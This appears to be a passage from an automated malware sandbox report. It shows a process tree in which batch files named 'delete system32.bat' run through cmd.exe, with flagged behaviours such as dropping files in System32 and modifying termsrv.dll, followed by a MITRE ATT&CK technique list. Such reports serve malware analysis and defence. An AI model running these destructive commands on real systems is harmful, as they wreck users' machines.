      4⤵
      PID:3860

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1752

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\delete system32.bat" "
1⤵
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Boot or Logon Autostart Execution: Print Processors
- Drops file in System32 directory
- Modifies termsrv.dll
PID:1712

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\delete system32.bat"
1⤵
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Boot or Logon Autostart Execution: Print Processors
- Drops file in System32 directory
- Modifies termsrv.dll
PID:4508

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Delete SYSTEM32 (1).bat"
1⤵
PID:4132
- C:\Windows\system32\wscript.exe
  wscript "<PATH_OF_".vbs"_FILE>"
  2⤵
  PID:3672

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38b1855 /state1:0x41c64e6d
1⤵
PID:3608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

LSASS Driver

T1547.008

Print Processors

T1547.012

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

LSASS Driver

T1547.008

Print Processors

T1547.012

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry